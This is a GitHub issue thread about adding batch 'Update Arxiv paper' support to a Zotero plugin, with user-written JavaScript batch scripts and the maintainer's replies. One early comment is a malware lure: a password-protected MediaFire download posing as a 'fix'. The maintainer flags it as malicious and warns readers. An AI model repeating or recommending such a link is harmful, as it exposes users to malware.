### ISSUE TITLE
[Feat] add 'Update Arxiv paper' when select multiple paper

### ISSUE THREAD

**Issue by syheliel** [AllanChain/zotero-arxiv-workflow#11]
Currently, 'Update Arxiv paper' button won't show up if multi-item is selected. It would be nice to have a batch update function.
![image](https://github.com/user-attachments/assets/7b203bda-d74b-49ef-bb9a-d7f2aae5f0ac)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by AllanChain** [comment]
This is a good idea and this feature is planned. However, to make this feature useful and friendly, I have to create a new window showing the status of each item, which requires some extra work. I'll leave this issue open and implement later.

Also, I have deleted a malicious comment. Please don't download and open anything which does not come from the maintainers.

**Comment by syheliel** [comment]
Thank you, I almost downloaded malicious code.

**Comment by mahdi-shafiei** [comment]
Thanks for providing this plugin. In the meanwhile, is there a way to run the update on a set of items in the Zotero "Run JavaScript" developer tool. These items are the result of a custom search (calling `search` from an object of `Zotero.Search()`). I want to be able to run given every item resulting from the above search:

```
async Zotero.arXivWorkflow.arXivUpdate(
  resultItem: Zotero.Item
)
```

**Comment by AllanChain** [comment]
@mahdi-shafiei Sorry, I made a mistake in README. The function should be `Zotero.arXivWorkflow.api.arXivUpdate`.

**Comment by mahdi-shafiei** [comment]
I forgot to update this thread. Adding this feature will be greatly appreciated. 

Your reply above fixed the above issue. After that, I modified the script with a bunch of delays added in (long ones)  and exception handling. However even with these modifications,  I get `operation timed out` when running `Zotero.arXivWorkflow.api.arXivUpdate(item);`. After the first `operation timed out`, I get `late cancellation observer` and then `uncaught exception: Object `.

```
var fieldName = "url";
var lookupstr = "rxiv"

var fieldID = Zotero.ItemFields.getID(fieldName);
var s = new Zotero.Search();
s.libraryID = ZoteroPane.getSelectedLibraryID();
s.addCondition(fieldName, 'contains', lookupstr);

try {
    var ids = await s.search();
    if (!ids.length) {
        return "No items found";
    }

    let successCount = 0;
    let errorItems = [];

    // Move outside transaction to prevent rollback issues
    const delay = (ms) => new Promise(resolve => setTimeout(resolve, ms));
    
    for (let id of ids) {
        try {
            let item = await Zotero.Items.getAsync(id);
            await delay(5000); // 5 second delay
            
            // Try up to 3 times with longer delays between retries
            let maxRetries = 3;
            let attempt = 1;
            let success = false;

            while (attempt <= maxRetries && !success) {
                try {
                    // Wrap the update in its own transaction
                    await Zotero.DB.executeTransaction(async function () {
                        await Zotero.arXivWorkflow.api.arXivUpdate(item);
                    });
                    success = true;
                    successCount++;
                    Zotero.debug(`Successfully updated item ${id} on attempt ${attempt}`);
                } catch (retryError) {
                    Zotero.debug(`Attempt ${attempt} failed for item ${id}: ${retryError.message}`);
                    
                    if (attempt === maxRetries) {
                        throw retryError;
                    }
                    
                    // Longer delays between retries
                    await delay(10000 * attempt); // 10s, 20s, 30s
                    attempt++;
                }
            }
            
            await delay(10000); // 10 second delay after successful update
            
        } catch (itemError) {
            errorItems.push({
                id: id,
                error: itemError.message || 'Unknown error'
            });
            Zotero.debug(`Error processing item ${id}: ${itemError.message}`);
            // Add extra delay after error to let system recover
            await delay(15000);
        }
    }

    // Prepare summary message
    let summary = `Processed ${successCount} item(s) successfully.`;
    if (errorItems.length > 0) {
        summary += `\nFailed items (${errorItems.length}):`;
        errorItems.forEach(item => {
            summary += `\n- Item ${item.id}: ${item.error}`;
        });
    }
    
    return summary;

} catch (mainError) {
    Zotero.debug(`Main execution error: ${mainError.message}`);
    return `Script failed: ${mainError.message}`;
}
```

**Comment by mahdi-shafiei** [comment]
@AllanChain Any comment on the script above or how this feature can be implemented outside Zotero using Zotero API and arXivWorkflow API?

**Comment by AllanChain** [comment]
> Any comment on the script above or how this feature can be implemented outside Zotero using Zotero API and arXivWorkflow API?

Your script looks fine. Ideally, the updates can run in parallel, but the sequential update should work if the number of items is not large.

It should be noted that I'm still receiving bug reports about data loss (e.g. #37, #21), and operating on multiple items is at your own risk.

**Comment by isCopyman** [comment]
Based on @mahdi-shafiei's code, I also had Claude Code write one for me, and it works fine for me. However, I've noticed that sometimes I don't need to download new attachments; I just need to sync metadata, publisher, and other details. I hope a switch can be provided to choose whether to download PDF attachments.
```javascript
/**
 * Zotero arXiv Batch Update Script
 *
 * Features:
 * - Processes items manually selected in Zotero
 * - Automatically identifies and skips non-arXiv/preprint items
 * - Provides a detailed processing report and progress information
 *
 * How to use:
 * 1. Select the items to process in Zotero (multi-select is supported)
 * 2. Open Zotero Developer Tools: Ctrl+Shift+Alt+I (Windows/Linux) or Cmd+Shift+Alt+I (Mac)
 * 3. Copy and paste this script into the JavaScript console
 * 4. Click the "Run" button to execute
 *
 * Notes:
 * - Please back up your Zotero database before processing
 * - It's recommended to test with a small number of items first
 * - The script will automatically skip items that do not meet the criteria
 *
 * Author: Optimized based on discussions in GitHub issue #11
 * Repository: https://github.com/AllanChain/zotero-arxiv-workflow
 */

// Script for batch processing manually selected arXiv items
try {
    // Get the currently selected items in Zotero
    var selectedItems = ZoteroPane.getSelectedItems();

    if (!selectedItems.length) {
        return "❌ Please select items in Zotero to process first";
    }

    // Known preprint servers (obtained from plugin source code)
    const KNOWN_PREPRINT_SERVERS = [
        "arxiv.org",           // arXiv
        "www.biorxiv.org",     // bioRxiv
        "www.medrxiv.org",     // medRxiv
        "chemrxiv.org",        // ChemRxiv
        "osf.io"               // PsyArXiv
    ];

    // Filter eligible items
    var validItems = [];
    var skippedItems = [];

    for (let item of selectedItems) {
        let shouldProcess = false;
        let skipReason = "";

        // Check if the item type is 'preprint'
        if (item.itemType !== 'preprint') {
            skipReason = `Item type is "${item.itemType}", not a preprint`;
        } else {
            // Check if the URL contains a known preprint server
            let url = item.getField('url');
            if (!url) {
                skipReason = "Missing URL field";
            } else {
                try {
                    let urlHost = new URL(url).hostname;
                    if (KNOWN_PREPRINT_SERVERS.includes(urlHost)) {
                        shouldProcess = true;
                    } else {
                        skipReason = `URL host "${urlHost}" is not a known preprint server`;
                    }
                } catch (urlError) {
                    skipReason = "Invalid URL format";
                }
            }
        }

        if (shouldProcess) {
            validItems.push(item);
        } else {
            skippedItems.push({
                title: item.getDisplayTitle(),
                reason: skipReason
            });
        }
    }

    // Display filtering results
    let summary = `📊 Item Filtering Results:\n`;
    summary += `Total selected: ${selectedItems.length} items\n`;
    summary += `Eligible: ${validItems.length}\n`;
    summary += `Skipped: ${skippedItems.length}\n`;

    if (skippedItems.length > 0) {
        summary += `\n⏭️ Skipped Items:\n`;
        skippedItems.forEach(item => {
            summary += `- ${item.title}: ${item.reason}\n`;
        });
    }

    if (validItems.length === 0) {
        return summary + "\n❌ No eligible items to process";
    }

    // Start processing eligible items
    summary += `\n🚀 Starting to process ${validItems.length} arXiv items...\n`;

    let successCount = 0;
    let errorItems = [];

    // Delay function
    const delay = (ms) => new Promise(resolve => setTimeout(resolve, ms));

    // Process each eligible item
    for (let i = 0; i < validItems.length; i++) {
        let item = validItems[i];
        let itemTitle = item.getDisplayTitle();

        try {
            Zotero.debug(`[${i+1}/${validItems.length}] Processing: ${itemTitle}`);

            // Delay to avoid making requests too quickly (3 seconds)
            await delay(3000);

            // Retry mechanism (up to 2 retries)
            let maxRetries = 2;
            let success = false;

            for (let attempt = 1; attempt <= maxRetries && !success; attempt++) {
                try {
                    // Call the plugin's arXiv update API
                    await Zotero.arXivWorkflow.api.arXivUpdate(item);
                    success = true;
                    successCount++;
                    Zotero.debug(`✅ [${i+1}/${validItems.length}] Success: ${itemTitle}`);
                } catch (retryError) {
                    Zotero.debug(`❌ [${i+1}/${validItems.length}] Attempt ${attempt} failed: ${retryError.message}`);

                    if (attempt === maxRetries) {
                        throw retryError;
                    }

                    // Incremental delay for retries (5 seconds * attempt number)
                    await delay(5000 * attempt);
                }
            }

            // Short delay after success (2 seconds)
            await delay(2000);

        } catch (itemError) {
            errorItems.push({
                title: itemTitle,
                error: itemError.message || 'Unknown error'
            });
            Zotero.debug(`💥 [${i+1}/${validItems.length}] Failed: ${itemTitle} - ${itemError.message}`);

            // Longer delay after an error to allow the system to recover (4 seconds)
            await delay(4000);
        }
    }

    // Final result summary
    let finalSummary = summary + `\n📋 Processing Results:\n`;
    finalSummary += `✅ Successfully updated: ${successCount} items\n`;

    if (errorItems.length > 0) {
        finalSummary += `❌ Failed to update: ${errorItems.length} items\n`;
        errorItems.forEach(item => {
            finalSummary += `  - ${item.title}: ${item.error}\n`;
        });
    }

    finalSummary += `\n🎉 Batch processing complete!`;

    // Also output detailed results to the console
    console.log("=".repeat(50));
    console.log("arXiv Batch Update Complete");
    console.log("=".repeat(50));
    console.log(`Processing Time: ${new Date().toLocaleString()}`);
    console.log(`Success: ${successCount}/${validItems.length}`);
    if (errorItems.length > 0) {
        console.log("Failed Item Details:", errorItems);
    }
    console.log("=".repeat(50));

    return finalSummary;

} catch (mainError) {
    console.error("Batch update script execution error:", mainError);
    return `💥 Script execution failed: ${mainError.message}`;
}
```

**Comment by AllanChain** [comment]
[cc0258d](https://github.com/AllanChain/zotero-arxiv-workflow/commit/cc0258d64f100060cb7b53433cf082e609404a52) adds support for updating multiple papers and display them in a dialog. For consistency, the dialog will show even updating a single paper. For anyone interested helping me to test the feature before the final release, please download the latest CI build at https://github.com/AllanChain/zotero-arxiv-workflow/actions/runs/16726994593


<img width="612" height="244" alt="Image" src="https://github.com/user-attachments/assets/ba15f11b-8a3b-4b5a-b63b-7d10f03ff780" />
